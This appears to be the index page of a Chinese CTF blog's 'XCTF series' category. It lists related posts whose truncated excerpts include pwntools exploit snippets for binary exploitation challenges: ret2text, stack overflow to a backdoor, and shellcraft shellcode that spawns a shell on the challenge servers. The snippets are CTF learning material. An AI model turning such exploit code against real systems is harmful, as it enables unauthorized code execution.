XCTF系列
Created|Updated|比赛
|Post Views:
Author: Star
Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Related Articles
2025-08-23
0xGame2024-复现
where_is_my_binsh 一道简单的题目,存在栈溢出以及system函数,没有/bin/sh\x00字符串,给了变量something的地址,那么就先输入/bin/sh\x00字符串再打ret2text。 from pwn import*io=remote('gz.imxbt.cn',20884)elf=ELF('./where_is_my_binsh')bin_sh=0x0404090system=elf.sym['system']ret=0x040101ardi=0x0401323io.sendlineafter('If you want it ,then you have to create...
2025-08-03
2025_SWPU_NSSCTF_秋季招新训练赛
口算题卡一道计算题,主要考察脚本的编写,但因为没有时间限制,所以可以直接算100道题。 from pwn import*s = lambda buf: io.send(buf)sl = lambda buf: io.sendline(buf)sa = lambda delim, buf: io.sendafter(delim, buf)sal = lambda delim, buf: io.sendlineafter(delim, buf)r = lambda n=None: io.recv(n)ra = lambda t=tube.forever: io.recvall(t)ru = lambda delim: io.recvuntil(delim)rl = lambda: io.recvline()rls = lambda n=2**20: io.recvlines(n)su = lambda buf,addr: io.success(buf + "==>" + hex(addr))io =...
2025-08-24
ISCTF2023
stack一道不错的题目,让我对pwndbg的使用进一步的熟练 程序代码很简单,自定义输入字符串长度,通过循环不断输入,那么可以造成栈溢出,并且存在后门函数。但是此题的关键在于变量i会被覆盖,那么就会导致程序根据i将我们输入的东西写入到另一个地方。 因此,我们可以找准i的偏移,防止其被覆盖,我们就可以正常栈溢出到返回地址。 from pwn import*io=remote('challenge.imxbt.cn',20197)#io=process('./stack')ret=0x040101abackdoor=0x4012E6def debug(): gdb.attach(io) ...
2025-08-31
GeekChallenge2024
ez_shellcode简单的shellcode from pwn import*context.arch='amd64'io=remote('nc1.ctfplus.cn',39373)shellcode_addr=0x0401256shellcode=asm(shellcraft.sh())io.send(shellcode)payload=cyclic(0x18+8)+p64(shellcode_addr)io.sendline(payload)io.interactive() 你会栈溢出吗?简单的64位栈溢出,注意堆栈平衡 from pwn...
2025-11-06
LilCTF2025_ret2all
...
2025-10-15
NewStarCTF2025
Week1第一周的题都比较简单,就想说一下GNU那道比较新颖,挺好玩的。 GNU...
Announcement
This is my Blog